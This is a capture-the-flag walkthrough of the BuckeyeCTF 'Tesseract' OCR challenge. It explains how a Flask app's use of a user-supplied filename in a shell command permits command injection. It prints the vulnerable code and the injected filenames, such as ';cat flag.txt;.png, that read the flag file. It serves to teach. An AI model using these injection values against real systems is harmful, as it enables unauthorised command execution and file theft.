BuckeyeCTF Tesseract Walkthrough (OCR-as-a-Service)
This is write-up of the Tesseract (OCR-as-a-service) challenge from the Buckeye CTF this past weekend (Oct 23-24). Thank you to the organizers for this event, it was a fun challenge.
This is also a great challenge to read through for understanding basic command injection vulnerabilities.
Challenge Prompt
Here’s what the CTF prompt looks like (not a ton of detail):
If we go to the webpage at https://tesseract.chall.pwnoh.io/
, we see a simple file upload:
There’s nothing interesting in the source code, so I originally thought this was a file upload vulnerability (such as a PHP shell).
Then I realized, we were given source code, so I should check that out. 😅
Source Code
First of all, this program is a Flask (Python) app, and the entire app functionality is in app.py. After the imports and Flask boilerplate, we see that there are two endpoints, one at /
and one at /uploads/*
for retrieving files.
You can either GET or POST to the /
endpoint.
@main.route("/", methods=["GET", "POST"])
def upload_file():
messages = None
if request.method == "POST":
# check if the post request has the file part
if "file" not in request.files:
flash("No file part")
return redirect(request.url)
file = request.files["file"]
# If the user does not select a file, the browser submits an
# empty file without a filename.
if file.filename == "":
flash("No selected file")
return redirect(request.url)
if file:
filename = file.filename
file.save(os.path.join(current_app.config["UPLOAD_FOLDER"], filename))
# Run OCR on the uploaded image
process_path = os.path.join("/uploads", filename)
process = subprocess.run(
f"tesseract \'{process_path}\' \'{process_path}\' -l eng",
shell=True,
check=False,
capture_output=True,
)
print(process.args)
if process.returncode == 0:
print("Success")
return redirect(url_for("main.download_file", name=filename + ".txt"))
else:
messages = [process.stdout.decode(), process.stderr.decode()]
return render_template_string("""HTML stuff goes here, cut for length""",
messages=messages,
)
The other endpoint is pretty straightforward, no obvious vulns here:
@main.route("/uploads/")
def download_file(name):
return send_from_directory(current_app.config["UPLOAD_FOLDER"], name)
Finding the vulnerability
Let’s summarize that first endpoint, since it seems like that’s the location of the vulnerability:
- If it’s a POST request (i.e. if a file is being uploaded to this endpoint), check to see that a file is actually present.
- Next, get the filename.
- Save the file in the upload folder directory.
- Get a handle to the file’s location (“/uploads/your-file-name-here”)
- Run tesseract, which is an OCR service.
- If it worked, redirect the user to the downloaded file.
- If it didn’t work, display error messages from standard out.
One of the cardinal rules is to not trust user input. Another rule is not to give the user debugging output in the form of error messages and the like.
And both rules are being broken here.
Problem #1: Trusting user input
Let’s look closer at the tesseract command:
process = subprocess.run(
f"tesseract \'{process_path}\' \'{process_path}\' -l eng",
shell=True,
check=False,
capture_output=True,
)
This line runs tesseract
on the command line. I searched for python examples to see which argument was the source file and which one was the destination, thinking I could use command injection to write the value of flag.txt
into my image output.
Turns out I was making it more complicated than it needed to be.
Since it’s a command line argument, we can probably cut off the tesseract
command partway through, and inject our own command.
Python will take our filename and put it in between the single quotes, so something like:
tesseract 'ourfilename' 'ourfilename' -l eng
If we inject something like ;ls
, we’ll get:
tesseract ';ls' ';ls' -l eng
If we take a JPG or PNG file and rename it ;ls
, the OCR works and we get forwarded to the /uploads/%3Bls.txt
endpoint which isn’t what we want.
Much like SQL injection, we need to escape the single quote first. Let’s try ';ls
, giving us a filename of ';ls.png
Now we’re on to something!
We now have two error message outputs: the tesseract call was incomplete (which we already know), and our second command, the ls
, was unsuccessful.
It seems that it’s trying to find ls.txt
, rather than using ls
as a command by itself. Let’s add another ;
after our injected command: ';ls;
, making the filename ';ls;.png
Problem #2: Showing the user debugging output
This output didn’t look any different to me at first. And then I saw the output of the command… it isn’t in the second bullet point, it’s concatenated to the end of the first point:
It looks like our flag is in the same directory, so it should be easy to retrieve it:
__pycache__ app.py flag.txt jail.cfg requirements.txt run.sh sh uploads
Solution
Now that we have a way of doing command injection, we can view the debugging output, and we know where the flag is, all we need to do is rename our image to ';cat flag.txt;
, giving a full filename of ';cat flag.txt;.png
Let’s upload it and get the flag:
Thanks to the organizers!
References
- Resource on Python command injection: https://book.hacktricks.xyz/misc/basic-python/bypass-python-sandboxes
- CTF command injection problem in JS that gave me the idea to look for an equivalent injection in Python: https://ctftime.org/writeup/20365